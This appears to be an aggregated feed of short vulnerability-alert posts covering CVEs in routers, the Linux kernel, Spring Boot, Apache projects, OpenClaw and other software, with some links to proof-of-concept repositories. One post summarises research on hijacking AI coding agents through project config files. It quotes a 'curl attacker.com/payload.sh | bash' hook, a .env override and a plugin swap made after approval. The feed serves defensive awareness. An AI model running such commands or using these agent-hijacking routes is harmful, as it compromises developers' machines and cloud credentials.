OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41386/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:17:19
1 posts
🟠 CVE-2026-41383 - High (8.1)
OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41383/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:15:32
1 posts
🟠 CVE-2026-41378 - High (8.8)
OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41378/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T15:31:54
1 posts
🟠 CVE-2026-41602 - High (7.5)
Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41602/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T15:30:58
1 posts
🟠 CVE-2026-27760 - High (8.1)
OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27760/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T15:30:58
1 posts
🟠 CVE-2026-7289 - High (8.8)
A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7289/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T15:30:58
1 posts
🟠 CVE-2026-7288 - High (8.8)
A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7288/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T15:30:52
1 posts
🟠 CVE-2026-5944 - High (8.2)
An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5944/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T12:31:36
1 posts
🟠 CVE-2026-3323 - High (7.5)
An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T09:34:20
1 posts
🔴 New security advisory:
CVE-2026-7242 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-7242-totolink-a8000ru-unauthenticated-rce
updated 2026-04-28T09:34:20
1 posts
🚨 CVE-2026-7243: Critical OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Remote, unauthenticated RCE risk — public exploit out, no patch yet. Lock down management access & monitor for updates. https://radar.offseq.com/threat/cve-2026-7243-os-command-injection-in-totolink-a80-73a189fb #OffSeq #Vulnerability #RouterSecurity
##updated 2026-04-28T09:34:20
1 posts
⚠️ CRITICAL: CVE-2026-7248 in D-Link DI-8100 (fw 16.07.26A1) enables remote buffer overflow via 'fn' in CGI Endpoint. No patch available — restrict access & monitor for updates. Exploit code is public. https://radar.offseq.com/threat/cve-2026-7248-buffer-overflow-in-d-link-di-8100-798ac14e #OffSeq #DLink #Vuln #Infosec
##updated 2026-04-28T09:34:19
1 posts
Totolink A8000RU (v7.1cu.643_b20200521) faces CRITICAL OS command injection (CVE-2026-7244, CVSS 9.3). Remote, unauthenticated exploit possible. No patch yet — restrict mgmt access & monitor for updates. https://radar.offseq.com/threat/cve-2026-7244-os-command-injection-in-totolink-a80-f82a0e92 #OffSeq #Vuln #RouterSecurity #CVE2026_7244
##updated 2026-04-28T09:34:12
1 posts
1 repos
updated 2026-04-28T03:31:36
2 posts
CVE-2026-32644 (CRITICAL, CVSS 9.2): Milesight MS-Cxx63-PD cameras have default SSL private keys, exposing encrypted traffic to interception & tampering. No patch yet — restrict access & follow vendor updates. https://radar.offseq.com/threat/cve-2026-32644-cwe-321-in-milesight-ms-cxx63-pd-60e79b90 #OffSeq #IoTSecurity #Vulnerability
##🔴 CVE-2026-32644 - Critical (9.8)
Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-32644/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T03:31:36
2 posts
🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) suffers from OS command injection (CVE-2026-7203). Remote, unauthenticated attackers can fully compromise affected routers. No patch confirmed — disable remote mgmt & isolate. https://radar.offseq.com/threat/cve-2026-7203-os-command-injection-in-totolink-a80-b3a02d32 #OffSeq #Vuln #IoTSec
##🔴 CVE-2026-7203 - Critical (9.8)
A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os comma...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7203/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T03:31:36
3 posts
🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) affected by CVE-2026-7204 — remote OS command injection in CGI handler. No patch yet. Restrict access & monitor for updates. Public exploit disclosed. https://radar.offseq.com/threat/cve-2026-7204-os-command-injection-in-totolink-a80-304b8a45 #OffSeq #Vulnerability #IoTSecurity #CVE20267204
##🔴 CVE-2026-7204 - Critical (9.8)
A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command inje...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7204/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: Totolink A8000RU routers (7.1cu.643_b20200521) vulnerable to remote, unauthenticated OS command injection (CVE-2026-7204). No patch yet. Restrict access & monitor vendor channels. https://radar.offseq.com/threat/cve-2026-7204-os-command-injection-in-totolink-a80-304b8a45 #OffSeq #Vuln #RouterSecurity #CVE20267204
##updated 2026-04-28T00:31:48
1 posts
🟠 CVE-2026-41371 - High (8.5)
OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41371/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
4 posts
🚨 New security advisory:
CVE-2026-40976 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-40976-spring-boot-bypasses-default-security
Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws
Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.
**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/spring-boot-security-update-patches-critical-authentication-bypass-and-rce-flaws-m-w-3-i-y/gD2P6Ple2L
Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws
Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.
**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/spring-boot-security-update-patches-critical-authentication-bypass-and-rce-flaws-m-w-3-i-y/gD2P6Ple2L
🔴 CVE-2026-40976 - Critical (9.1)
In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40976/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
1 posts
🟠 CVE-2026-27785 - High (8.8)
Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27785/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
1 posts
🟠 CVE-2026-41364 - High (8.1)
OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sandbox tar upload that allows remote attackers to write arbitrary files. Attackers can exploit this by uploading tar archives containing symlinks to escape the sandbox an...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41364/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
1 posts
🟠 CVE-2026-7160 - High (8.8)
A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the function formTracert of the file /boaform/formTracert. Executing a manipulation of the argument datasize can lead to command injection. The attack may be performed fro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7160/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:56
1 posts
🟠 CVE-2026-31652 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
mm/damon/stat: deallocate damon_call() failure leaking damon_ctx
damon_stat_start() always allocates the module's damon_ctx object
(damon_stat_context). Meanwhile, if damon_cal...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31652/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:56
1 posts
🔴 CVE-2026-31649 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix integer underflow in chain mode
The jumbo_frm() chain-mode implementation unconditionally computes
len = nopaged_len - bmax;
where nopaged_len = skb_headl...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:12
1 posts
💥 CVE-2026-7155: CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Exploitable remotely, no auth needed. Disable remote mgmt & restrict access until patch. Details: https://radar.offseq.com/threat/cve-2026-7155-os-command-injection-in-totolink-a80-1189da9b #OffSeq #Vulnerability #CVE2026_7155 #IoTSecurity
##updated 2026-04-27T21:31:12
1 posts
🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7156, CVSS 9.3). Exploit is public — remote attackers can fully compromise devices. Disable remote mgmt & restrict access now. https://radar.offseq.com/threat/cve-2026-7156-os-command-injection-in-totolink-a80-8abcd97a #OffSeq #CVE20267156 #IoTSecurity
##updated 2026-04-27T21:31:02
1 posts
🟠 CVE-2026-30350 - High (7.5)
An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30350/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:51
1 posts
🔴 CVE-2026-31669 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix slab-use-after-free in __inet_lookup_established
The ehash table lookups are lockless and rely on
SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability
during RCU...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31669/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:51
1 posts
🟠 CVE-2026-31667 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
Input: uinput - fix circular locking dependency with ff-core
A lockdep circular locking dependency warning can be triggered
reproducibly when using a force-feedback gamepad with...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31667/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:51
1 posts
🟠 CVE-2026-31665 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_ct: fix use-after-free in timeout object destroy
nft_ct_timeout_obj_destroy() frees the timeout object with kfree()
immediately after nf_ct_untimeout(), without w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31665/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:50
1 posts
🟠 CVE-2026-31662 - High (7.5)
In the Linux kernel, the following vulnerability has been resolved:
tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG
The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements
bc_ackers on every inbound group ACK, even when the...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31662/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:50
1 posts
🔴 CVE-2026-31657 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: hold claim backbone gateways by reference
batadv_bla_add_claim() can replace claim->backbone_gw and drop the old
gateway's last reference while readers still follow ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31657/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:49
1 posts
🟠 CVE-2026-31648 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
mm: filemap: fix nr_pages calculation overflow in filemap_map_pages()
When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I
encountered some very strange crash issu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:16:43.370000
1 posts
🟠 CVE-2026-31656 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat
A use-after-free / refcount underflow is possible when the heartbeat
worker and intel_engine_park_heartbeat() ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:14:35.180000
1 posts
🟠 CVE-2026-31650 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
mmc: vub300: fix use-after-free on disconnect
The vub300 driver maintains an explicit reference count for the
controller and its driver data and the last reference can in theory...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31650/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:00:27.157000
1 posts
🟠 CVE-2026-31666 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix incorrect return value after changing leaf in lookup_extent_data_ref()
After commit 1618aa3c2e01 ("btrfs: simplify return variables in
lookup_extent_data_ref()"), the...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31666/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T19:59:32.810000
1 posts
🟠 CVE-2026-31663 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
xfrm: hold dev ref until after transport_finish NF_HOOK
After async crypto completes, xfrm_input_resume() calls dev_put()
immediately on re-entry before the skb reaches transpor...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31663/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T19:50:46.320000
1 posts
🟠 CVE-2026-42039 - High (7.5)
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a Range...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42039/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
3 repos
https://github.com/rakeshelamaran98/CVE-2026-30081
Notepad++ Patches Critical Format String Injection Flaw
Notepad++ version 8.9.4 patches a critical format string injection vulnerability (CVE-2026-3008) that allow attackers to crash the application or leak sensitive memory data via malicious language packs.
**If you use Notepad++, update to version 8.9.4 immediately through the official website or built-in updater, especially if you use a non-English language pack. Only download language packs from the official Notepad++ source, never from forums or third-party sites.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/notepad-patches-critical-format-string-injection-flaw-w-m-g-l-s/gD2P6Ple2L
updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31680 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: flowlabel: defer exclusive option free until RCU teardown
`ip6fl_seq_show()` walks the global flowlabel hash under the seq-file
RCU read-side lock and prints `fl->opt...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31680/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31676 - High (7.5)
In the Linux kernel, the following vulnerability has been resolved:
rxrpc: only handle RESPONSE during service challenge
Only process RESPONSE packets while the service connection is still in
RXRPC_CONN_SERVICE_CHALLENGING. Check that state unde...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31676/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:22.917000
1 posts
🟠 CVE-2026-31683 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: avoid OGM aggregation when skb tailroom is insufficient
When OGM aggregation state is toggled at runtime, an existing forwarded
packet may have been allocated with o...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31683/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:06
1 posts
🔴 New security advisory:
CVE-2026-33454 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-33454-apache-camel-header-injection-via-email
updated 2026-04-27T18:32:05
1 posts
🔴 CVE-2026-41635 - Critical (9.8)
Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed.
The fix che...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41635/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:32:05
1 posts
🔴 CVE-2026-40860 - Critical (9.8)
JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40860/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:31:59
1 posts
🔴 CVE-2026-31682 - Critical (9.1)
In the Linux kernel, the following vulnerability has been resolved:
bridge: br_nd_send: linearize skb before parsing ND options
br_nd_send() parses neighbour discovery options from ns->opt[] and
assumes that these options are in the linear part ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31682/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:31:59
1 posts
🔴 CVE-2026-31685 - Critical (9.4)
In the Linux kernel, the following vulnerability has been resolved:
netfilter: ip6t_eui64: reject invalid MAC header for all packets
`eui64_mt6()` derives a modified EUI-64 from the Ethernet source address
and compares it with the low 64 bits of...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31685/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:31:56
1 posts
🔴 CVE-2026-31659 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: reject oversized global TT response buffers
batadv_tt_prepare_tvlv_global_data() builds the allocation length for a
global TT response in 16-bit temporaries. When a ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31659/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:51
1 posts
🟠 CVE-2026-31678 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
openvswitch: defer tunnel netdev_put to RCU release
ovs_netdev_tunnel_destroy() may run after NETDEV_UNREGISTER already
detached the device. Dropping the netdev reference in des...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31678/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:51
1 posts
🟠 CVE-2026-31675 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_netem: fix out-of-bounds access in packet corruption
In netem_enqueue(), the packet corruption logic uses
get_random_u32_below(skb_headlen(skb)) to select an inde...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31675/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:50
1 posts
🟠 CVE-2026-31673 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
af_unix: read UNIX_DIAG_VFS data under unix_state_lock
Exact UNIX diag lookups hold a reference to the socket, but not to
u->path. Meanwhile, unix_release_sock() clears u->path ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31673/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:47
1 posts
🔴 CVE-2026-31668 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
seg6: separate dst_cache for input and output paths in seg6 lwtunnel
The seg6 lwtunnel uses a single dst_cache per encap route, shared
between seg6_input_core() and seg6_output_...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31668/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T15:30:46
1 posts
🔴 CVE-2026-31637 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
rxrpc: reject undecryptable rxkad response tickets
rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then
parses the buffer as plaintext without checking whether
cry...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31637/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-24T19:59:44
2 posts
The diversity of advisory is key. Look at how good the advisory of GitHub is compared to the others.
##⚪️ Microsoft Issues Emergency Patch for Critical ASP.NET Vulnerability
🗨️ Microsoft has released an out-of-band update for ASP.NET Core. The patch fixes a critical vulnerability in the Data Protection cryptographic APIs that allowed unauthenticated attackers to obtain SYSTEM privileges by forging authentication cookies. The vulnerability is tracked as CVE-2026-40372 and…
##updated 2026-04-24T13:43:37.347000
1 posts
6 repos
https://github.com/dinosn/pack2theroot-lab
https://github.com/baph00met/CVE-2026-41651
https://github.com/0xBlackash/CVE-2026-41651
https://github.com/shibaaa204/Pack2TheRoot
updated 2026-04-24T00:31:58
1 posts
Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID
Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.
**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-cvss-10-0-ssrf-vulnerability-in-entra-id-c-d-3-y-z/gD2P6Ple2L
updated 2026-04-23T18:32:57
1 posts
Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.
##updated 2026-04-23T13:39:54.420000
1 posts
LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours of Disclosure https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html
##updated 2026-04-23T04:00:28
1 posts
4 repos
https://github.com/dinosn/CVE-2026-3844
https://github.com/0xgh057r3c0n/CVE-2026-3844
Over 400,000 sites at risk as hackers exploit Breeze Cache plugin flaw (CVE-2026-3844) https://securityaffairs.com/191267/uncategorized/over-400000-sites-at-risk-as-hackers-exploit-breeze-cache-plugin-flaw-cve-2026-3844.html
##updated 2026-04-22T18:31:57
1 posts
“The clearest example is kill -1 (CVE-2026-35369). GNU reads -1 as “signal 1” and asks for a PID. uutils read it as “send the default signal to PID -1”, which on Linux means every process you can see. Yikes!”
wat
##updated 2026-04-22T15:31:39
1 posts
updated 2026-04-21T16:16:20.540000
1 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-04-17T15:24:57.753000
1 posts
----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##updated 2026-04-17T15:09:46.880000
1 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-04-16T21:55:08
1 posts
2 repos
https://github.com/daptheHuman/cve-2026-40176-cve-2026-40261
https://github.com/terminat0r7031/composer-CVE-2026-40261-CVE-2026-40176-PoC
Composer (the dominant PHP package manager) shipped 2.9.6 and 2.2.27 LTS in April. The release fixes two command-injection bugs in the Perforce driver. CVE-2026-40261, severity 8.8. A malicious composer.json declares a Perforce repository and the shell runs whether or not Perforce is installed. Packagist disabled Perforce metadata April 10. Most CI build agents kept no audit trail across the ninety days the bug was live.
